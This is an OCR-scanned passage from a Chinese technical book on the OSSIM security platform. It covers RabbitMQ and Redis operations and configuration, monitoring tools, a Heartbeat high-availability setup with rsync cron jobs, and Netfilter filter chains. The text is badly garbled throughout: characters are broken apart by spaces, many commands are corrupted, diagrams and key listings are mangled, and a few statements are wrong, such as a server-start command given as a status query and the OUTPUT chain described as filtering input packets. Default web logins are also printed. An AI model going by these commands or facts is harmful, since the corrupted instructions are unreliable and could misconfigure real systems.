RabbitMQ 环境 变量 的 配置 文件 位 于 /etc/rabbitmq/rabbitmq-env.conf， 使 用 时 需要 查询 
RabbitMQ 状态 命令 ， 方 法 如 下 : 
#rabbitmq-server alienvault \\ 这 里 的 alienvault 代表 OSSIM Server 的 主机 名 称 


此 时 ， 能 显示 rabbitMQ 的 端口 、 节 点 名 称 和 主 目录 (/var/lib/rabbitmq)。 


永远 不 要 用 Kill 命令 直接 停止 RabbitMQ 服务 器 ， 而 应 该 采用 rabbitmqetl 命令 ， 这 样 可 以 
将 数据 同步 保存 到 磁盘 ， 然 后 关闭 服务 : 
dirabbitmqctl stop 
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1.7.4 选择 Key/Value 存储 

早期 OSSIM 版 本 中 依然 采用 MySQL+Memcached 的 架构 存储 数据 ， 由 于 存在 性 能 和 
一 致 性 问题 ， 在 OSSIM 4.4 后 续 版 本 中 引入 Redis 服务 器 ， 有 读者 会 问 为 什么 选用 
Key/Value 存储 ? 从 SIEM 收集 信息 的 角度 出 发 ， 无 论 日 志 还 是 安全 事件 都 属于 非 结 构 化 
数据 ,在 日 志 关联 分 析 时 ， 非 结构 化 的 数据 量 会 大 大 超过 结构 化 数据 ， 这 些 数据 之 间 存 在 
关联 ， 如 果 将 这 些 数据 直接 存 入 数据 库 ， 那 么 对 数据 库 访 问 频 率 将 增加 ， 由 于 单个 表 行 数 
的 猛 增 , 对 表 的 访问 行 数 成 比例 增加 ， 在 多 个 表 之 间 的 数据 调用 将 会 产生 大 量 的 计算 , 足 
以 将 任何 一 个 数据 分 析 系统 压 垮 。 

在 分 析 OSSIM 系统 各 集成 开源 工具 中 发 现 系统 没有 进行 持久 化 ， 如 果 RabbitMQ 服务 器 
重启 会 导致 消息 丢失 ,所 以 采用 Redis Server 来 解决 这 些 问 题 , Redis 是 一 个 Key/Value 的 NoSQL 
数据 库 , Redis 作为 缓存 服务 器 , 数据 存储 在 内 存 ,所 以 速度 比 MySQL 要 快 得 多 , 尤其 在 OSSIM 
的 Web UI 中 很 多 的 排行 榜 应 用 ， 取 出 TOP 10 的 操作 : 包括 各 种 仪表 盘 、 计 算 器 应 用 、SIEM 
控制 台 的 Unig 操作 、 获 取 某 段 时 间 所 有 数据 的 列表 、 取 最 新 的 TOP N 操作 ， 以 及 在 分 布 式 日 
志 收 集 系统 中 消息 队列 的 处 理 ， 包 括 报表 输出 中 产生 Top 10 Attacker Host, Top 10 Used Ports, 
Top 15 Alarms， 这 些 都 要 用 到 Redis 服务 。 如 图 1-46 是 Redis 在 OSSIM 系统 中 的 典型 应 用 。 


AlienVault HIDS: Login session closed [USERNAME] 


= 
[i 
i 
| 
i 
i 
i 
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图 1-46 Redis 在 OSSIM 系统 中 的 典型 应 用 


1.7.5 OSSIM 下 操作 Redis 
下 面 列举 了 常见 的 有 关 Redis 的 操作 实例 。 
(1) 查询 Redis 端口 是 否 被 占用 使 用 如 下 命令 。 
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(2) 查询 Redis 服务 是 否 运行 。 


(3) 测试 启动 。 返 回 PONG 表示 启动 成 功 。 


注意 启动 Redis 客户 端 工具 命令 为 redis-cli。 


(4) 查看 服务 器 的 统计 信息 (以 OSSIM USM 为 例 )。 


在 这 些 统计 信息 中 ， 以 下 内 容 需要 了 解 。 


uptime in seconds: 自 Redis 服务 器 启动 以 来 ， 经 过 的 秒 数 。 

used memory: 由 Redis 分 配器 分 配 的 内 存 总 量 ， 以 字 节 (byte) 为 单位 。 
used memory human; 以 可 读 的 格式 返回 Redis 分 配 的 内 存 总 量 。 

used memory rss; 从 操作 系统 的 角度 ， 返 回 Redis 已 分 配 的 内 存 总 量 ， 该 值 和 top 
命令 输出 一 致 。 

used memory peak: Redis 的 内 存 消 耗 峰 值 (以 字 节 为 单位 ) 。 

used memory peak human: 以 可 读 的 格式 返回 Redis 的 内 存 消耗 峰值 。 
used memory lua: Lua 引擎 所 使 用 的 内 存 大 小 (以 字 节 为 单位 ) 。 

total connections received: 服务 器 已 接受 的 连接 请 求 数量 。 

total commands processed: 服务 器 已 执行 的 命令 数量 。 

instantaneous ops per sec: 服务 器 每 秒 钟 执行 的 命令 数量 。 

keyspace hits: 命中 key 的 次 数 。 


该 命令 可 查看 配置 信息 及 各 种 统计 信息 。 
(5) 查看 实时 转 储 收 到 的 请 求 。 
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1422506320.387463 "SETEX" "SimpleCache-system:system all info:7a4cl86bebfob39e951aS465f4eee3fe" " 
600" "[false, V'Can't connect to system with IP 192.168.91.135 msg:('msg': 'SSH encountered an un 
known error during the connection. We recommend you re-run the command using -vvvv, which will en 
able SSH debugging output to help diagnose the issue', 'failed': True) "]" 

1422506320.387608 "SADD* "SimpleCache-system-keys* "system all info:7a4clB6bebfob39e951a5465f 4eee 
3fe" 

1422506320.387626 "EXEC" 

1422506321.668430 "PING" 

1422506324.871261 "SCARD" *SimpleCache-sensor plugins-keys* 

1422506324.871778 "MULTI" 

1422506324.871800 "SETEX" "SimpleCache-sensor plugins:get plugins from yaml:95f77ee87647cbO30f dee 
bb77eO0fS3ba" "600" "[true, (A"darkV*: (X*192.168.91.131V*: {\"msg\": \*SSH encountered an unknown 
error during the connection. We recommend you re-run the command using -vvvv, which will enable 
SSH debugging output to help diagnose the issueV*, \"failed\": true)), \"contacted\": {}}]" 
1422506324.871867 "SADD" "SimpleCache-sensor plugins-keys' "get plugins from yaml:95í77ee87647cbO 
30fdeebb77e0f53ba" 

1422506324.871886 "EXEC" 

1422506324. 872778 "PING" 

1422506330.513573 "SCARD" "SimpleCache-system-keys* 

1422506330.593223 "MULTI" 

1422506330.593278 "SETEX" "SimpleCache-system:system all info:4946183995572b33a09572757bd35efd" " 
600" "[false, \"Can't connect to system with IP 192.168.91.131 msg:('msg': 'SSH encountered an un 
known error during the connection. We recommend you re-run the command using -vvvv, which will en 
able SSH debugging output to help diagnose the issue', 'failed': True) \"]" 

1422506330.593406 "SADD" "SimpleCache-system-keys* "system all info:4946183995572b33a09572757bd35 


下 面 对 操 作 做 个 简单 的 解释 : 


(6) 


MULTI 记事 务 开始 */ 

EXEC PATE ARS 

PING /# 通 常用 于 测试 与 服务 器 的 连接 是 否 仍然 生效 #/ 

SCARD /# 返 回 集合 key 的 基数 ( 集合 中 元 素 的 数量 ) */ 

SETEX 人 # 将 值 value 关联 到 key， 并 将 key 的 生存 时 间 设 为 seconds*/ 


查看 系统 所 有 Keys。 


redis 127.0.0.1:6379» keys *  /* keys 命令 用 于 管理 键 */ 


(7) 


查看 键 值 类 型 。 


type 可 查看 键 值 类 型 ,我 们 看 如 下 操作 。 


127. 
1l 


127. 
set 

127. 
stri 


(85 


0.0.1:6379» keys * 
"SimpleCache-system:267372578e8118431d27673a097b0a291135f 56c017 5fd87ff 367352a3f6b98a" 
"SimpleCache-sensor plugins-keys" 

"SimpleCache-backup-keys'" 

"simpleCache-sensor, network-keys" 

"SimpleCache-network status :141629ec54e43977e936d5683545a1d1428a0567e5b6bf0ae253404dbfb332f4" 
"SimpleCache-system:768395f670bf482a0791e5c86a33e1a271725bae8a728f45c396ce260e3f055d" 

"Simp lecache- network- Status evs 
"SimpleCache-support.tunnel:b5332d8d1b59f5664757d090057d75182bc499c4602ab35647ba8a508c2f2c6a" 
"simpleCache-system:a09f e08ee122adb53f 5748dc49d55966bbf0159c9b1bedOf6fb1829f9771bb7e" 
"SimpleCache-sensor. plugins :11alecdOce60bSeedb8ee22dd9d83e6ad3a7939b95a84458ae1b367391b3d68f" 
"SimpleCache-sensor. network :0f 5b6b7f461210888386719a5e3300413d37a90f 8aaf 3242dec02de7188f35c7" 
"simpleCache-backup:41380adf7fOadbfO0b5516c19a6bd6fefbc06a4a4e8eald92e74d795b1fcfcade" 
"simplecache-support. tunnel -keys" 

“Sinplecache-ping_system keys™ 

ne em 5b526ea96e2e234952e6c3f74275daccc33bb08451c9104338aa6b99f 82ef d" 
"SimpleCache-system cont1g:97e56c5cee59d4d71186e0a9a5c2b56eabd27d324cd67d0e7 c2bf08b15c2255b" 


"simpleCache-ping system:9805186f8cfa4fba553145d671c650239c7cf 5ec257b12d63cfaa02abc2d8a25" 


) "simpleCache-system-keys" 


0.0.1:6379» type SimpleCache-system-keys 


0.0.1:6379» type SimpleCache-system:267372578e8118431d27673a097b0a291135f 56c0175fd87ff367352a 
ng 


确认 一 个 键 是 否 存在 。 


redis 127.0.0.1:6379> exists SimpleCache-backup-keys 
(integer) 1 /* 返回 1 表示 存在 ， 如 果 返 回 0 表示 不 存在 */ 
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(9) 保存 最 新 的 key 值 。 


#redis-cli BGSAVE /* 异 步 保存 数据 到 磁盘 
#redis-cli SAVE /* 同 步 保 存 数据 到 磁盘 


执行 该 命令 ， 可 在 后 台 异 步 保 存 当 前 数据 库 的 数据 到 磁盘 。 


(10) Redis 服务 器 性 能 检测 。 


ossim411:~# redis-benchmark -h localhost -p 6379 -c 100 -n 10000 
sasssa PING TNDLINE susma: 
10000 requests completed in 0.30 seconds 
100 parallel clients 
3 bytes payload 
keep alive: 1 
91.58% <= 3 milliseconds 
97.98% <= 4 milliseconds 
99.84% <= 5 milliseconds 
100.00% <= 5 milliseconds 
33003.30 requests per second 


(OD 安全 性 。 

在 redis.conf 的 配置 文件 中 采用 ACL 控制 器 确保 安全 。 

bind 127.0.0.1 

通过 上 面 这 行 语句 ， 即 可 把 Redis 绑 定 在 单个 接口 。 有 关 Redis 更 多 命令 集 使 用 方法 ， 请 
参阅 http://redisdoc.com/. 


1.7.6 Redis Server 配置 详解 

Memcached 是 高 性 能 分 布 式 内 存 缓存 服务 器 , 本 质 上 是 一 个 内 存 Key/Value 数据 库 , 但 不 
支持 数据 持久 化 ， 服 务 器 关闭 之 后 数据 全 部 丢失 ，Redis 支持 数据 持久 化 。 

Alienvault api 是 OSSM 重要 组 件 之 一 ， 其 中 间 件 架构 采用 了 
RabbitMQ+Celery+Redis+Erlang。Redis 也 是 一 个 开源 的 Key/Value 存储 系统 。 与 Memcached 
类 似 ，Redis 将 大 部 分 数据 存储 在 内 存 中 ， 支 持 的 数据 类 型 包括 : 字符 串 、 哈 希 表 、 链 表 、 集 
合 、 有 序 集合 以 及 基于 这 些 数据 类 型 的 相关 操作 。 

Redis 使 用 C 语言 开发 ， 能 在 大 多 数 Linux、BSD 和 Windows 系统 应 用 。 当 前 Redis 应 用 
广泛 在 新 浪 、 淘 宝 、Github 等 组 织 。 

OSSIM 4.8 系统 中 Redis 系统 的 配置 文件 路 径 为 /etc/redis/redis.conf 下 面 我 们 在 OSSIM 系 
统 中 ， 首 先 来 查看 Redis 的 配置 文件 中 定义 了 哪些 主要 参数 以 及 这 些 参数 的 作用 。 

(1) 第 17 fT. * daemonize yes”， 默 认 情况 下 redis 在 后 台 运 行 。 

(2) 第 21 行 “pidfile /var/run/redis/redis-server.pid", 3X8 Redis 默认 存放 PID 文件 的 位 置 。 

G) 第 25 íF "port 6379”， 服 务 端口 默认 为 6379。 

(4) 第 30 行 “bind 127.0.0.1”， 只 接收 来 自 本 机 的 请 求 ， 如 果 注 销 此 行 那么 则 处 理 所 有 
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发 来 的 请 求 。 

(5) 第 48 行 “loglevel notice”， 日 志 记录 级 别 ，Redis 共 支 持 四 个 级 别 ， 分 别 是 debug. 
verbose、notice、warning， 在 生产 环境 下 通常 使 用 notice 级 别 。 

(6) 第 53 行 “logfile /var/log/redis/redis-server.log”， 日 志 记 录 的 位 置 。 

(7) 第 68 行 “databases 16”, 可 用 数据 库 。 

(8) 第 86 行 “save 900 1”， 保 存 数据 到 磁盘 。Redis 支持 两 种 持久 化 方式 : 一 种 是 快照 
方式 〈snapshotting)， 是 将 数据 存储 到 二 进 制 文件 中 ， 另 一 种 是 aof(Append only file) 方 式 ， 默 
认 未 启用 该 方式 。 下 面 看 第 一 种 快照 方式 的 配置 ， 如 果 Redis ÆN 秒 内 ， 超 过 M 个 key 被 修 
改 ， 则 自动 做 快照 ， 其 格式 为 save <seconds><changes>， 代 表 在 多 长 时 间 内 ， 达 到 多 少 次 更 新 
操作 ， 就 将 数据 同步 到 数据 文件 RDB， 实 际 上 相当 于 条 件 触发 取 快 照 的 机 制 。“save 900 1" 
表示 900 秒 内 至 少 有 1 个 key 被 改变 就 保存 数据 到 磁盘 。 读 者 可 以 查看 /var/lib/redis/dump.rdb， 
该 文件 默认 会 将 当前 数据 库 中 所 有 数据 转 储 到 文件 。 对 于 “save 900 1” 这 条 语句 表示 900 秒 做 

-次 快照 。 由 于 快照 方式 在 一 定 间隔 时 间 内 完成 ， 如 果 Redis 意外 宕 机 ， 就 会 丢失 最 后 一 次 快 

照 的 内 容 ， 才 出 现 了 Append only file 方式 。 

(9) 第 94 行 “rdbcompression yes”， 存 储 至 本 地 数据 库 时 是 否 压 缩 数 据 ， 默 认为 yes; 

(10) 第 97 £7 "dbfilename dump.rdb”， 定 义 存储 数据 库 文件 名 ， 路 径 在 /var/liblrediydumpirdb。 

(11) 第 107 行 “dir/var/lib/redis”， 定 义 数 据 库 文件 存放 路 径 。 

(12) 第 217 行 “maxmemory 536870912”， 指 定 Redis 最 大 内 存 设 置 为 512MB， 也 可 以 
比 这 个 值 大 ，Redis 在 启动 时 会 把 数据 加 载 到 内 存 中 ， 达 到 最 大 内 存 后 ，Redis 会 先 尝试 清除 
已 到 期 或 即将 到 期 的 Key，Redis 同时 也 会 移 除 空 的 list 对 象 。 

(13) 第 240 行 “maxmemory-policy volatile-lru”， 当 内 存 达到 最 大 值 的 时 候 Redis 会 选择 
的 数据 处 理 方式 : volatile-lru 代表 利用 LRU 算法 (Least Recently Used 最 近 最 久未 使 用 算法 ， 

-种 内 存 回收 算法 ) 移 除 设置 过 期 时 间 的 key。 

(14) 第 268 行 “appendonly no”， 这 是 另 一 种 数据 持久 化 方式 ， 默 认 情况 下 ，Redis 会 在 
后 台 异 步 方式 把 数据 库 镜 像 备 份 到 磁盘 。 如 果 此 处 设置 为 yes, 那么 就 必须 启用 appendfilename 
appendonlyaof〈 此 功能 默认 为 关闭 状态 )。 

(15) 第 294 行 “appendfsync everysec", Redis 支持 三 种 同步 AOF 文件 的 策略 : no 代表 
不 进行 同步 ， 由 系统 操作 。always 代表 每 次 只 要 有 写 操作 就 进行 同步 ，everysec 代表 对 写 操作 
进行 累积 ， 每 秒 同步 一 次 ， 默 认 “everysec”， 按 照 速 度 和 安全 二 者 进行 折 中 。 

(16) 第 482 行 “activerehashing yes", Redis 将 在 每 100 毫秒 时 ， 使 用 1 毫秒 的 CPU 时 
间 来 对 Redis 的 hash〔 哈 希 ) 表 进行 重新 hash， 这 样 可 以 降低 内 存 的 使 用 。 


1.7.7 RabbitMQ. Redis 与 Memcached 监控 
RabbitMQ 提供 了 完善 的 管理 和 监控 工具 ， 下 面 在 OSSIM USM 中 开始 设置 Web 监控 。 
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1. RabbitMQ Web 监控 


在 浏览 器 输入 http://yourip:15672/ 进 行 访问 ， 如 果 从 远程 登录 用 户 名 和 密码 可 以 采用 以 上 
指定 的 ossim/alb2c3, 如 果 是 本 机 登录 可 以 采用 guest/guest 通过 Web 界面 实时 掌握 RabbitMQ 
服务 器 文件 、 队 列 、 进 程 、 内 存 和 磁盘 空间 占用 情况 。 

2. Redis 监控 


通常 通过 Redis FLA info. monitor 命令 获取 信息 ， 操 作 不 方便 。 如 何 对 它 进行 监控 ， 
了 解 它 的 性 能 ， 我 们 先 通过 一 个 命令 行 工具 redis-faina 来 感受 一 下 效果 。 


该 命令 执行 后 可 看 到 实时 的 数据 ， 并 且 有 一 定 的 统计 数据 功能 ， 可 以 作为 命令 行 工具 使 
用 ， 不 过 Redis 版 本 要 大 于 2.4。 

3. Redis-live 

Redis Live 是 另 一 款 用 来 监控 Redis 实例 ， 分 析 查 询 语句 ， 比 redis-faina 更 方便 的 是 它 具 
有 Web 界面 ， 更 加 直观 。 要 运行 redis-live 首先 安装 它 所 需要 的 所 有 依赖 包 ， 步 又 如 下 : 


下 面 从 远程 主机 克隆 版 本 库 。 
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接着 编辑 redis-live.conf， 默 认 只 能 本 机 访问 ， 所 以 配置 文件 中 的 IP 为 127.0.0.1。 


#vi redis-live.conf 

"RedisServers": 

t 

üsenger"msmisq OTT 

"port": 6379 

) 被 监控 的 Redis， 可 以 配置 多 个 。 

"DataStoreType" : "redis"，---- 监 控 数 据 存储 方式 


"Redisstats server": 
"server": "192.168.11.100", 
"port": 6380 存储 监控 数据 的 Redis 


启动 redislive 

启动 监控 脚本 ， 监 控 30 秒 ，duration 参数 以 秒 为 单位 。 启 动 命令 如 下 : 
#./redis-monitor.py --duration-30 

启动 WebServer。 

Redislive 使 用 tornado 作为 Web 服务 器 。 启 动 命令 如 下 : 
$./redis-live.py 

浏览 器 输入 http://ip:8888/index.html, XE ip 换 成 你 的 IP 地 址 就 OK mio 

4. phpMemcachedAdmin 

phpMemcachedAdmin 是 一 个 用 来 管理 memcached 的 一 个 可 视 化 的 管理 工具 , 采用 php 的 


脚本 语言 实现 ， 下 载 地 址 为 http:/down.S$lcto.comy/data/2098348， 操 作 步 骤 如 下 。 
安装 很 简单 ， 直 接 解压 缩 输入 服务 器 地 址 端口 和 路 径 即 可 使 用 ， 下 面 新 建 一 个 目录 。 
#mkdir /usr/share/ossim/www/phpmemcached/ 
#tar zxvf phpMemcachedAdmin-1.2.1-r233.tar.gz -C /usr/share/ossim/www/phpmemcached/ 
然后 在 浏览 器 地 址 栏 中 输入 https://yourip: 11211/ossim/phpmemcached/, 即 可 访问 它 的 Web 
UI 界面 。 


OSSIM 高 可 用 架构 


随 着 OSSIM 在 企业 中 深入 部 署 , 我 们 会 考 滤 如 何 提高 OSSIM 系统 的 高 可 用 性 。 一 台 OSSIM 
存在 单 点 故障 暗藏 安全 隐患， 可 以 采用 MySQL HA (MySQL 双 机 热 备 ) 的 手段 得 以 实现 。 


1.8.1 OSSIM 高 可 用 实现 技术 


Linux 下 常 通过 Keepadlived+LVS 或 者 Heartbeat+LVS 的 方案 实现 HA，Heartbeat 项 目 是 
Linux-HA 工程 的 组 成 部 分 , 是 目前 开源 HA 项 目 中 最 成 功 的 例子 , mH. Heatbeat 也 是 OSSIM 
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系统 自 带 的 组 件 〈 默 认 已 安装 完成 V3.0.3)。 如 图 1-47 所 示 为 OSSIM HA 的 架构 图 。 


图 1-47 OSSIM-HA 架构 图 


这 里 安装 HA 有 两 个 步 又， 一 个 为 实体 应 用 ， 另 一 个 为 备用 的 虚拟 应 用 。 至 少 要 保持 两 台 
Server 的 AlienVault-Center 之 间 连 接 ， 因 为 AlienVault-Center 管理 着 Agent, Server, IDM, 
Forwarder 等 服务 ， 所 以 需要 它们 和 虚拟 IP. 保持 连接 。 

保留 从 服务 器 (OSSIM) 的 以 下 服务 : 


Alienvault Center 
Rsyslog 

Cron 

Heartbeat 
MySQL 
MongoDB 


OSSIM-HA 地 址 分 配 举例 如 表 1-9 所 示 。 


表 1-9 OSSIM-HA 地 址 分 配 举例 
虚拟 主机 名 


192.168.207.110 
192.168.207.111 
192.168.207.112 
192.18.207.113 


VServer 192.168.207.120 192.168.207.121 


VLogger 192.168.207.121 


192.168.207.114 
VSensor 192.168.207.121 192.168.207.120 
192.168.207.115 
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1.8.2 ”安装 环境 

Master/Slave 所 有 OSSIM (v4.3). 系统 版 本 保持 一 致 ， 即 要 求 两 台 服 务 器 软件 硬件 配置 一 
致 ， 两 台 服 务 器 同 在 一 个 网 段 。 安 装 期 间 分 配 每 台 设备 一 个 卫 ， 当 系统 安装 好 后 ， 首 先进 行 
同步 时 间 进 入 控制 台 System Preferences 一 Change Location 一 Change Location— Date and time 
一 Configure NTP Server， 修 改 方法 如 图 1-48 所 示 。 


mE 
图 1-48 配置 NTP 
然后 修改 默认 分 配 的 主机 名 ， 注 意 不 要 重 名 ， 最 后 选择 Apply all changes 确认 。 


1.8.3 配置 本 地 主机 
首先 SSH 远程 登录 或 者 直接 在 服务 器 的 控制 台 下 操作 ， 在 终端 控制 台 下 选择 “Jailbreak 
System”， 编 辑 ossim_setup.conf 配置 文件 。 


(dvi fete/ossim/ossim setup.conf 00 
修改 以 下 域 值 : 


保存 退出 后 ， 进 行 以 下 操作 。 
| E SSSSÉÉÉÓZNILLLEGLLIUIT 


1.8.4. 配置 远程 主机 
同样 方法 ， 编 辑 远程 主机 的 ossim setup.conf 文件 。 
© dvi /etc/ossim/ossim setup.conf 0 


修改 以 下 域 值 。 


保存 退出 后 执行 如 下 命令 。 
ssinrecontig 


1.8.5 ”同步 数据 库 
连接 本 地 应 用 服务 器 ， 进 入 root 控制 台 ， 输 入 如 下 命令 : 


1.8.6 同步 本 地 文件 
在 同步 本 地 文件 时 ， 需 注意 下 面 的 操作 必须 在 本 地 和 远程 服务 器 上 完成 。 开 始 编辑 
/etc/cron.d/ossim_ha_rsync， 为 了 保证 两 台 机 器 之 间 的 同步 ， 需 要 激活 下 面 配置 行 。 


Risk metrics graphs 
#0 * * * * root /usr/local/sbin/ossim ha-rsync. sh var lib ossim rrd /var/lib/ossim/rrd »/dev/null 


Netflow configuration 
#2 * * * * root /usr/local/sbin/ossim ha-rsync. sh etc nfsen /etc/nfsen »/dev/null 


Netflow data collected 
#4 + * * * root /usr/local/sbin/ossim ha-rsync. sh var cache nfdump /var/cache/nfdump »/dev/null 


Netflow graphs 
#6 + + * + root /usr/local/sbin/ossim ha-rsync. sh var nfsen /var/nfsen »/dev/null 


Nagios configuration 
#8 * + * * root /usr/local/sbin/ossim ha-rsync. sh etc nagios3 conf. d/etc/nagios3/conf. d »/dev/null 


Nagios checks 
#10 * * * * root /usr/local/sbin/ossim ha-rsync. sh var cache nagios3 /var/cache/nagios3 »/dev/null 


0ssim database backups 
#12 * * * * root /usr/local/sbin/ossim ha-rsync. sh var lib ossim backup /var/lib/ossim/backup »/dev/null 


0ssim agent configuration and plugins 
#14 * * * * root /usr/local/sbin/ossim ha-rsync. sh etc ossim agent/etc/ossim/agent »/dev/null 


Ntop graphs and statistics 
#16 * + * * root /usr/local/sbin/ossim ha-rsync. sh var lib ntop /var/lib/ntop 5/dev/null 


Ntop configuration 
$18 * * * * root /usr/local/sbin/ossim ha-rsync. sh etc ntop /etc/ntop 5/dev/null 


经 过 以 上 几 个 步骤 HA 配置 工作 即 告 一 段落 。 
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OSSIM 防火 墙 


Linux 中 很 多 功能 都 是 以 模块 加 载 方式 来 扩充 系统 功能 ，Netfilter 同样 采用 这 种 方式 存在 
T Linux 中 。 如 果 理 解 了 Linux 模块 加 载 也 就 能 够 理解 Netfilter 的 模块 加 载 方式 。 大 家 在 
/lib/modules/kernel_version/kernel/net/ipv4/netfilter/ 目 录 下 能 够 看 到 很 多 以 “.ko” 为 扩展 名 的 文 
件 , 那里 存放 的 就 是 已 经 编译 好 的 模块 文件 。 如果 在 Netfilter 模块 目录 仔细 查看 , 会 发 现 各 种 
功能 的 模块 ,这些 模块 仅 是 提供 某 些 过 滤 功 能 ， 如 果 想 让 Netfilter 为 我 所 用 ， 还 需要 赋予 它 执 
行 的 “规则 ” 定 出 了 规则 后 ，Netfilter 才 知道 哪些 数据 包 通 过 ， 哪 些 数据 包 阻止 ， 又 有 哪些 
数据 包 进行 置换 处 理 。 


1.9.1 理解 Filter 机 制 
首先 我 们 看 个 例子 ， 在 客户 机 上 通过 Firefox 访问 ， 远 端 Apache 服务 器 上 的 Web WIH, 
像 这 样 的 操作 中 对 于 Netfilter 有 三 种 封包 类 型 (如 图 1-49 所 示 ) 分 别 是 : 


E: 
Linux 服 EE 


图 149 封包 类 型 


1. INPUT 类 型 


当 客户 机 访问 Web 服务 器 的 httpd 进程 时 ， 对 于 Web 服务 器 而 言 ， 属 于 入 站 的 包 ， 换 名 
话说 ， 就 是 网 上 其 他 主机 送 给 本 机 httpd 进程 的 封包 ， 这 里 把 它 定义 为 INPUT 类 型 封包 (图 
1-49 中 左 侧 上 方 的 箭头 )。 


2. OUTPUT 类 型 


与 INPUT 相反 ， 由 Web 服务 器 的 httpd 进程 连接 到 客户 机 上 的 这 类 封包 就 属于 OUTPUT 
类 型 〈 图 1-49 中 右 侧 上 方 的 箭头 )， 也 就 是 本 机 httpd 进程 所 产生 的 封包 。 


3. FORWARD 类 型 


在 图 1-49 中 ， 如 果 是 Web 服务 器 的 封包 ， 就 属于 FORWARD 类 型 。 在 什么 情况 下 会 产生 
这 种 类 型 封包 ? 我 们 拿 Linux 当 作 路 由 器 使 用 时 就 会 有 FORWARD 类 型 封包 产生 。 

有 了 上 面 的 基本 概念 ， 下 面 开始 讨论 过 滤 表 ，Filter Table 有 三 个 链 (Chain)， 大 家 可 以 形 
象 地 理解 为 自行 车 中 的 链条 ， 它 是 环 环 相 扣 的 ， 封 包 在 网 络 上 传送 也 是 如 此 。 

Filter 表 的 结构 如 图 1-50 所 示 ， 你 会 发 现 三 种 封包 类 型 ， 下 面 详细 为 大 家 分 析 一 下 : 
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FRR R 


INPUT OUTPUT FORWARD 
Chain Chain Chain 

| Rulel | 山上 Ruler | | Rulel | 
| Rule2 | | Rule2 | | Ruez | 
| ETE || REESE 
[mue] [mec] 


图 1-50 Filter 表 结构 


€ INPUT 链 : 为 了 理解 这 一 问题 ， 我 们 还 是 拿 个 实例 进行 分 析 ， 例 如 我 们 要 保护 Web 
服务 器 的 httpd 进程 ， 在 三 种 封包 类 型 中 ， 应 该 注意 哪 一 种 呢 ? 肯定 是 INPUT 类 型 
封包 那么 你 需要 将 用 来 过 滤 INPUT 类 型 的 封包 写 到 INPUT 链 的 规则 之 中 ， 这 样 就 
能 起 到 保护 httpd 进程 的 目的 。 总 之 ，INPUT 链 是 用 来 存放 过 滤 INPUT 类 型 封包 的 
规则 ， 常 用 在 保护 本 机 的 情况 下 。 

€ OUTPUT $: OUTPUT 链 是 用 来 存放 过 滤 INPUT 类 型 封包 的 规则 ， 常 用 于 限制 本 机 
进程 的 网 络 链接 。 

€ FORWARD 链 : 在 图 1-50 中 Linux 服务 器 作为 路 由 器 使 用 ， 用 来 保护 远 端的 一 台 
Web 服务 器 ， 那 么 应 该 限制 那 类 封包 类 型 ? 就 是 FORWARD 类 型 ， 也 就 是 说 
FORWARD 链 用 来 保护 防火 墙 后 面 的 服务 器 。 


由 于 Filter 机 制 非常 复杂 , 为 了 使 大 家 容易 理解 ， 用 了 一 个 简单 的 示意 图 表示 Filter 原理 ， 
如 图 1-51 所 示 ， 注 意图 中 路 由 表 虽 然 画 了 两 个 ， 但 实际 只 有 一 个 ， 也 就 是 我 们 在 系统 中 用 
"route -n” 看 到 的 内 容 ， 路 由 表决 定 了 封包 的 传送 路 径 ， 它 在 多 网 卡 的 系统 中 尤为 重要 。 本 
地 进程 就 是 上 面 所 述 的 Web 服务 器 进程 ， 大 家 可 以 理解 为 httpd 进程 。 


< > * 


EM 7 — 


| mu% 
I 
Y 
本 地 流程 mM 
* 


mak 


1-51 Filter 原理 图 
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接 下 来 ， 以 三 种 不 同 的 场景 来 说 明 网 络 封包 在 Filter 机 制 中 被 处 理 的 过 程 。 


CD 在 上 网 时 ， 客 户 机 连接 服务 器 ， 也 就 是 网 络 封包 的 目的 地 是 Web 服务 器 的 httpd XE 
程 ， 封 包 首先 送 到 路 由 表 ， 并 由 路 由 表 的 内 容 决定 传输 路 径 。 既 然 客 户 机 是 访问 Web 服务 器 
上 的 页 面 , 也 就 是 封包 是 送 给 本 地 进程 httpd 的 , 因此 封包 被 送 入 INPUT 链 , 此 时 如 果 INPUT 
链 允 许 通 过 ， 那 么 封包 就 会 被 送 入 本 地 进程 ， 不 让 过 就 被 丢弃 (Drop 掉 )。 

(2) 当 服 务 器 返回 结果 ， 需 要 链接 客户 机 进程 ， 这 时 由 本 地 进程 httpd 往外 传送 封包 ， 
首先 封包 会 被 传送 入 路 由 表 ， 由 这 里 的 内 容 决 定 封包 传输 路 径 ， 接 着 被 送 入 OUTPUT 链 ， 如 
果 允 许 则 出 站 ， 如 果 不 允 许 则 封包 就 会 被 丢弃 Drop 掉 )。 

(3) 当 Linux 系统 作为 防火 墙 部 署 ， 当 作 网 关 式 防火 墙 使 用 ， 当 封包 要 通过 防火 墙 ， 首 
先入 站 进入 路 由 表 ， 由 路 由 表 判断 ， 封 包 要 由 另 一 网 卡 口 送出 ， 封 包 就 会 送 入 FORWARD ft, 
此 时 如 果 FORWARD 链 里 的 规则 不 许 封包 通过 ， 那 么 直接 丢弃 。 反 之 ， 封 包 出 站 离开 防火 墙 。 


1.9.2 ”规则 匹配 过 程 

介绍 了 Filter 工作 原理 之 后 , 接 下 来 讲解 封包 在 每 个 链 中 如 何 匹配 。 这 个 概念 也 非常 重要 。 
还 是 以 图 1-51 为 例 加 以 说 明 , 实际 应 用 中 每 个 链 中 包含 的 规则 数量 不 尽 相 同 ,无 论 哪 一 个 Filter 
表 其 匹配 原则 都 是 “First Match”， 即 优先 执行 。 当 我 们 在 防火 墙 上 添加 的 新 规则 被 逐条 加 入 
到 INPUT 链 中 ， 被 顺序 编号 ， 例 如 rules1、rules2 等 。 当 封包 进入 INPUT 链 之 后 ，Filter 机 制 
会 根据 这 个 封包 的 特征 从 INPUT 链 内 的 第 一 条 规则 逐个 往 下 匹配 ， 如 果 封 包 进 来 遇 到 第 一 条 
规则 允许 通过 ， 那 么 这 个 封包 就 会 进入 到 本 地 进程 httpd， 而 不 管 rule2、rule3 的 规则 是 什么 。 
相反 ， 如 果 第 一 条 规则 要 丢弃 ， 即 便 是 rule2 规则 允许 通过 ， 也 不 起 任何 作用 ， 这 就 是 “First 
Match” 原 则 。 

在 使 用 规则 时 大 家 要 注意 一 个 原则 , 尽量 减少 不 必要 的 规则 , 因为 当 封包 进入 防火 墙 后 会 
在 特定 的 链 里 逐一 被 对 比 ， 规 则 条 数 越 多 ， 封 包 在 防火 墙 中 滞留 的 时 间 就 越 长 ， 消 耗 CPU 运 
算 周期 越 长 ， 防 火 墙 性 能 就 会 降低 。 

